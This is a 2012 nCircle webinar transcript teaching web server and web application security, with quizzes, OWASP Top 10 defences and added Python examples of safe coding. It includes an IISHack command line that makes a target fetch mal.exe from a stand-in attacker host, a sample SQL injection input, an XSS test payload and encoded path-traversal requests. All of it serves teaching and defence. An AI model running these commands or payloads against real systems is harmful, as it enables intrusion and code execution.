nCircle Webinar: Get Your Black Belt in Web Application Security (transcript)
© 2012 nCircle. All rights reserved.
Get Your Black Belt in Web Application Security, 26 April 2012
Web Server and Web Applications Security
Why Web Servers and Web Applications are hard to Defend
Why is attacking a web server or web applications one of the easiest attack methods?
– On the perimeter
– Accessible by anyone on the Internet
– Need to balance functionality with security
– Port 80 and port 443 (can't just block them)
– Lack of security awareness of many web developers
– High level of traffic: hard to distinguish an attack from high volumes of legitimate traffic
Typical Attack Steps against a Web Server
1. Reconnaissance (passive)
2. Scanning and enumeration (active)
3. Gaining Access (exploit)
4. Escalation of privilege
5. Maintain access
6. Covering tracks and placing backdoors
Two Methods of Attack: The Web Server and Web Applications
• Web Server Attacks
  – Vulnerabilities in the web server or web server configuration
  – Examples: Buffer Overflows, Traversals
• Web Application Attacks
  – Vulnerabilities in web applications
  – Examples: Command Injection, XSS (Cross Site Scripting)
Ichi (one)
With respect to defending against web attacks, what is the security problem with port 80?
a. It is the default TFTP port
b. It can be closed
c. It is not a well-known port
d. It can’t be blocked
Difficulty: Easy/Medium
Ni (two)
For an attack to work on a web server or a web application what does it need to have?
a. An exploit
b. A risk
c. A vulnerability
d. A configuration
Difficulty: Easy/Medium
Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.
Web Server Attacks
Buffer Overflow Attack
A buffer overflow attack allows an attacker to overwrite code in the program’s execution path and thus take control of the program to execute the attacker’s code.
Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)
Example:
IISHack.exe exploits a buffer overflow in the IIS HTTP daemon. Below is a sample invocation:
c:\> iishack www.WebserverA.com 80 www.hackserver.com/mal.exe
Web Server File System Traversal Attacks
• Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.
• By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.
• The attack is initiated by inserting special characters in URLs, for example the ../ sequence.
• Encoding can be used to bypass Web server filtering.
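The document-root check described above, as an added Python example that is not part of the webinar: it decodes a request path repeatedly (so a double-encoded ../ cannot slip past a single decode), walks the segments, and refuses any request that would step above the document root. DOC_ROOT and the sample requests are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root for this example (not a path from the webinar)
DOC_ROOT = "/var/www/html"

def decode_fully(url_path, max_rounds=3):
    """Undo URL encoding until the text stops changing, so a double-encoded
    sequence (%252e%252e%252f -> %2e%2e%2f -> ../) cannot slip past a filter
    that decodes only once."""
    for _ in range(max_rounds):
        decoded = unquote(url_path)
        if decoded == url_path:
            return decoded
        url_path = decoded
    raise ValueError("too many layers of URL encoding")

def resolve_request_path(url_path):
    """Map a request path onto a file under DOC_ROOT. Raises ValueError when
    the decoded path would step above the document root."""
    # backslash is a separator on Windows web servers, so treat it as one too
    decoded = decode_fully(url_path).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    kept = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue                      # empty or current-directory segment
        if segment == "..":
            if not kept:                  # nothing left to go up from: traversal
                raise ValueError("path escapes document root")
            kept.pop()
            continue
        kept.append(segment)
    return posixpath.join(DOC_ROOT, *kept)

def escapes_root(url_path):
    """Convenience wrapper: True when the request would be rejected."""
    try:
        resolve_request_path(url_path)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    # Constructed sample requests: legitimate, plain ../, URL-encoded, double-encoded
    for req in ["/images/logo.png", "/images/../index.html", "/../../outside.txt",
                "/..%2f..%2foutside.txt", "/%252e%252e/%252e%252e/outside.txt"]:
        print(req, "->", "REJECTED" if escapes_root(req) else resolve_request_path(req))
```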
San (three)
Which one of the following is NOT one of the typical attacks used against a web server like Apache?
a. ARP poisoning
b. Buffer overflow
c. Source disclosure
d. File system traversal
Difficulty: Easy/Medium
Shi (four)
A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?
a. Buffer boundary
b. File system traversal
c. Encryption
d. File overflow
Difficulty: Easy/Medium
Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.
Web Application Attacks
OWASP Top 10 Categories
A1-Injection
A2-Cross Site Scripting (XSS)
A3-Broken Authentication/Session Management
A4-Insecure Direct Object References
A5-Cross Site Request Forgery (CSRF)
A6-Security Misconfiguration
A7-Insecure Cryptographic Storage
A8-Failure to Restrict URL Access
A9-Insufficient Transport Layer Encryption
A10-Unvalidated Redirects and Forwards
OWASP Top 10 (2010 List) – www.owasp.org
Injection (Command Injection – OWASP A1)
• Occurs when untrusted data is sent to a command interpreter as part of a command or query.
• Cleverly formed data can trick the command interpreter into performing unintended commands or revealing unintended information.
• Examples of command injection:
  – SQL Injection
  – Script Injection
• Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program.
SQL Injection (Valid Data)
As an example, the user enters Jill and Brown into two input fields on a web page.
The program takes this input into the CustID variable and dynamically creates the query string:
SELECT * FROM accounts WHERE customerID = 'Jill_Brown'
The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown’s record as expected.
SQL Injection (Invalid Data)
The user enters Jane and Doe' OR '1'='1 on the web page.
The program takes this input and dynamically creates the query string:
SELECT * FROM accounts WHERE customerID = 'Jane_Doe' OR '1'='1'
The program sends this SQL query to the SQL database, which then retrieves ALL of the records in the accounts table – NOT as expected.
Defenses Against SQL Injection
• Prepared Statements (parameterized queries)
• Stored Procedures
• Escaping all user supplied input
• Least privilege
• White list input validation
Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)
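The valid-data and invalid-data queries from the two SQL injection slides, followed by the prepared-statement and white-list defenses from this one, as an added Python example that is not part of the webinar. The in-memory sqlite3 accounts table and its rows are constructed for the example.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the webinar's 'accounts' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (customerID TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("Jill_Brown", 100), ("Jane_Doe", 250), ("Joe_Bloggs", 75)])
    return conn

def lookup_vulnerable(conn, first, last):
    """The slides' pattern: CustID is glued into the query string, so a quote
    in the input becomes part of the SQL that the interpreter parses."""
    cust_id = first + "_" + last
    query = "SELECT * FROM accounts WHERE customerID = '" + cust_id + "'"
    return conn.execute(query).fetchall()

def lookup_prepared(conn, first, last):
    """Prepared statement: the SQL text is fixed and CustID is bound as a
    parameter, so it can only ever be compared as a value."""
    cust_id = first + "_" + last
    return conn.execute("SELECT * FROM accounts WHERE customerID = ?",
                        (cust_id,)).fetchall()

def valid_name(part):
    """White list input validation: letters only, bounded length."""
    return part.isalpha() and 1 <= len(part) <= 40

def lookup_defended(conn, first, last):
    """Defense in depth: white list validation in front of the prepared statement."""
    if not (valid_name(first) and valid_name(last)):
        raise ValueError("name parts must be letters only")
    return lookup_prepared(conn, first, last)

if __name__ == "__main__":
    db = make_db()
    print("valid data    :", lookup_vulnerable(db, "Jill", "Brown"))          # one row
    print("invalid data  :", lookup_vulnerable(db, "Jane", "Doe' OR '1'='1"))  # every row
    print("prepared stmt :", lookup_prepared(db, "Jane", "Doe' OR '1'='1"))    # no rows
```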
Cross Site Scripting (XSS – OWASP A2)
• Cross-Site Scripting attacks are a type of injection attack in which malicious scripts are injected into otherwise benign and trusted web sites. Injection usually occurs by inserting untrusted data into a user's browser via a web page request.
Defenses Against XSS
Primary defense: Escaping untrusted data
“Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.
Rule #0: Never put untrusted data in a web page except in allowed locations
Rule #1: HTML escape before inserting untrusted data into HTML element content
Rules #2 - #7: These rules deal with the exceptions where you put untrusted data in "unallowed" locations
Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
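Rule #1 in working form, as an added Python example that is not part of the webinar: the six characters OWASP lists for HTML element content are escaped, and the same comment template is shown with and without the escaping. The template and the sample payload are constructed for the example.

```python
# OWASP XSS Prevention Cheat Sheet, Rule #1: the characters that must be
# escaped before untrusted data goes into HTML element content.
HTML_ESCAPES = {"&": "&amp;", "<": "&lt;", ">": "&gt;",
                '"': "&quot;", "'": "&#x27;", "/": "&#x2F;"}

def html_escape(untrusted):
    """Escape untrusted data for HTML element content. Each character is
    mapped once, so '&' in the input is never escaped twice. This is only
    correct for element content; attribute, JavaScript, CSS and URL contexts
    need the cheat sheet's Rules #2 - #7."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in untrusted)

def render_comment_vulnerable(comment):
    """Reflects the untrusted comment straight into the page: a script in
    the comment is parsed as markup and runs in every visitor's browser."""
    return '<div class="comment">' + comment + '</div>'

def render_comment_escaped(comment):
    """Same template with Rule #1 applied: the browser displays the text of
    the comment, and its angle brackets are data, not markup."""
    return '<div class="comment">' + html_escape(comment) + '</div>'

def contains_script_tag(html):
    """Crude check used only to contrast the two renderings."""
    return "<script" in html.lower()

if __name__ == "__main__":
    # Constructed untrusted input: the textbook proof-of-concept payload
    payload = "<script>alert(1)</script>"
    print(render_comment_vulnerable(payload))
    print(render_comment_escaped(payload))
```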
Broken Authentication and Session Management (OWASP A3)
• Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity.
Defenses Against Broken Authentication and Session Management
• Secure management of session identifiers
  – Do not put session identifiers in the URL
  – Session IDs should have a timeout feature
• Do not allow the login process to execute from an unencrypted page
• Password Change Controls
• Password use / strength / storage
• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
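The session-identifier points above (random IDs, carried in a cookie rather than the URL, idle timeout, no login over an unencrypted page), as an added Python example that is not part of the webinar. The store is in-memory, the 15-minute timeout is an assumed value, and the clock is injectable so the timeout can be exercised.

```python
import secrets
import time

IDLE_TIMEOUT_SECONDS = 15 * 60   # assumed idle timeout for this example

class SessionStore:
    """In-memory session table: opaque random IDs, idle timeout, cookie transport."""

    def __init__(self, timeout=IDLE_TIMEOUT_SECONDS, now=time.time):
        self.timeout = timeout
        self.now = now            # injectable clock so the timeout is testable
        self._sessions = {}       # session_id -> {"user": ..., "last_seen": ...}

    def create(self, user):
        # 32 bytes from the OS CSPRNG: unguessable and unrelated to the user
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": self.now()}
        return sid

    def cookie_header(self, sid):
        """Carry the ID in a cookie rather than the URL. Secure keeps it off
        unencrypted pages; HttpOnly keeps it away from page scripts."""
        return "Set-Cookie: SESSIONID=%s; Secure; HttpOnly; Path=/" % sid

    def user_for(self, sid):
        """Return the user bound to sid, or None if it is unknown or timed out."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self.now() - entry["last_seen"] > self.timeout:
            del self._sessions[sid]          # expired: forget it server-side
            return None
        entry["last_seen"] = self.now()      # sliding idle timeout
        return entry["user"]

    def logout(self, sid):
        """Invalidate on logout so a captured ID cannot be replayed later."""
        self._sessions.pop(sid, None)

def login_allowed(request_scheme):
    """Refuse to run the login process from an unencrypted (plain HTTP) page."""
    return request_scheme.lower() == "https"
```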
Go (five)
A web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?
a. Sequence infiltration
b. SQL injection
c. Cookie poisoning
d. Hidden parameter exploit
Difficulty: Easy/Medium
Roku (six)
What is one of the defenses against SQL Injection?
a. Least Privilege
b. Black list input validation
c. Sanitization
d. Proxy manipulation
Difficulty: Easy/Medium
Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.
Web Server and Web Application Defense Tools
Web Server and Application Defense Tools (1 of 2)
• Scanning and mapping tools
  – Ping, Nping, Nmap, Amap, SuperScan, …
• Vulnerability and Web vulnerability scanners
  – Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, …
• Web proxy tools
  – WebScarab, Paros Proxy, Burp Proxy, …
• Web mapping/ripping tools
  – Black Widow, Wget, skipfish, …
• Communication/data transfer tools
  – Ncat, telnet, ftp, …
• Exploits, Exploit Kits, and Exploit Frameworks
  – Program for a specific exploit
  – Pen Test frameworks: Metasploit, Core Impact, CANVAS
Web Server and Application Defense Tools (2 of 2)
• Password cracking tools
  – John the Ripper, Cain and Abel, PRTK, ophcrack, …
• Web Source Code examination tools
  – Instant Source, Firebug, …
• SQL Injection Tools
  – BSQL Hacker, The Mole, sqlmap, Pangolin, …
Network Defense Tools (Protecting the Web Server)
• Routers
• Firewalls (network layer)
• Web Application Firewalls (application layer)
• Web Application Proxies
• Honeypots/Honeynets
• Logging
• Intrusion Detection/Prevention System (IDS/IPS)
• Host-based Intrusion Detection (HIDS), e.g. file integrity detection
• Backups
• Computer Forensic Tools
Web Server Protection
• Protect the Web Server
• Vulnerability Assessment
• Harden the Web Server
  – Host (OS)
  – Web Server
  – Web Services
• Logging
• Backups and recovery
Place the Web Server in an Untrusted Zone
Security Harden the Web Server (1 of 2)
• Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)
• Host (OS) hardening
• Web Server hardening
  – Use tools like IIS Lockdown and URLscan
  – Harden each service you offer on your Web Server
  – Disable / remove anything you don't use or need: accounts, ports, services, plug-ins
  – Configuration settings
  – Permissions
Security Harden the Web Server (2 of 2)
• Authentication and Access Control
  – File and directory permissions
  – Account password and lockout policies
• Logging and Audit Policies
• Vulnerability and Compliance Assessments
  – Vulnerability scanner
  – Web application vulnerability scanner
  – Configuration scanner
  – Audits for compliance assessments
  – Penetration testing / manual testing
Web Server Attack Countermeasures
• Buffer Overflow
  – Can be mitigated by conducting frequent scans for server vulnerabilities
  – Promptly acquiring and installing patches and service packs
  – Implementing effective firewalls
  – Applying web configuration lockdown utilities
• File System Traversal
  – Promptly apply patches and updates to the web server
  – Restrict privileges to executable programs such as cmd.exe
  – Set file and directory permissions
  – Locate the system software on a different disk drive from the web site software and content directory
Shichi (seven)
Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?
a. Banner grabbing
b. Defeating authentication
c. Scanning
d. Password Cracking
Difficulty: Medium/Hard
Hachi (eight)
What is a good tool to help harden an IIS web server? (choose the best answer)
a. Cain and Abel
b. URLscan
c. ncat
d. WebScarab
Difficulty: Medium/Hard
Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan.
Resources
• OWASP (Open Web Application Security Project) www.owasp.org
• NIST (National Institute of Standards and Technology) www.nist.gov
• SANS www.sans.org
• Web Application Security Consortium (WASC) www.webappsec.org
• SecTools.org http://sectools.org
Questions?